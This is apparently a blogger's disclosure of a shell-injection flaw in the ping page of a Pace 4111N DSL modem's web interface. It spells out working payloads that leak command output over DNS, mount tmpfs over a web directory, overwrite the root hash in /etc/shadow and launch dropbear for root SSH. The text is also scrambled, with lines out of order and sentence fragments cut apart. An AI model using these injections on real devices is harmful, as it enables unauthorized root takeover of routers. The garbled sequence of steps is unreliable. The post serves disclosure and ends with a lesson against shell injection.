This is probably coming a bit late. I wanted to make sure the vendor and my former ISP (I moved) had ample time to patch this.
Last I recall, the patch had not rolled out. I let them know well over a year ago.
The Pace 4111N is a DSL modem. It runs Linux. It gives you not-quite unlimited access from a password written on a sticker on the unit itself. In my case, it was rented from Sonic.net. I believe that firmware 18.104.22.168.1 is affected, and possibly later versions.
For whatever reason, I wanted more access. I no longer have the modem, just memories and notes on it. So, bare with me.
Perusing the various "utilities" of the web interface (
I came across the "ping" interface:
Something curious inside me tried the following as the host to ping:
go-beyond.org). It worked.
echo $(localhost) would ping 127.0.0.1, and so
What I found was that I only got output from the
ping command, and nothing
else. That output was pretty much just limited to whatever IP address I put in,
or it tried to resolve.
Anyway, this had me thinking. At one point, I pointed the modem to use
192.168.42.105 as the DNS resolver. That way, I could see the command output as
DNS queries, more or less. It turns out, hostnames are pretty picky. I had to
tr and get rid of un-DNSable characters from the output. This might look
$(whoami) and I would see
? A root in tcpdump on my laptop.
At some point, I figured out that
/mnt/web/ui/icons/ mapped to
tmpfs to the rescue!
$(mount -t tmpfs tmpfs /mnt/web/ui/icons)
And you can verify this over DNS:
$(mount | grep tmpfs | tail -n 1 | tr -d " ")
And look at running processes
$(ps auxf > /mnt/web/ui/icons/tmp.txt), so I checked
And it worked!
Now, fuller root with some logging in case it doesn't work.
# Give it our hash: openssl passwd -crypt "password" $(sed -i s/1VbtpZPngOWf2/lobwLmuIgWIHo/ /etc/shadow > /mnt/web/ui/icons/tmp.txt)
And start dropbear...
$(dropbear_startup & echo 127.0.0.1; true)
Unfortunately, that seems to break our
ping interface. Not sure why. Oh well.
ssh firstname.lastname@example.org, your password is password. This seems to last until
reboot, but no guarantees.
I believe Pace has fixed this and I bugged Sonic.net many times about rolling out the fix.
To be clear, this is nothing magical. It just gives you more access to your moden if you already have user level access. Might be able to use it in some clever way, but it's mostly relevant for poking around and having fun on your modem. If you have this as a rented modem, your ISP may not want you to do so.
Moral of the story: Don't allow shell injection from your web applications. And ideally, don't run them as root in this case.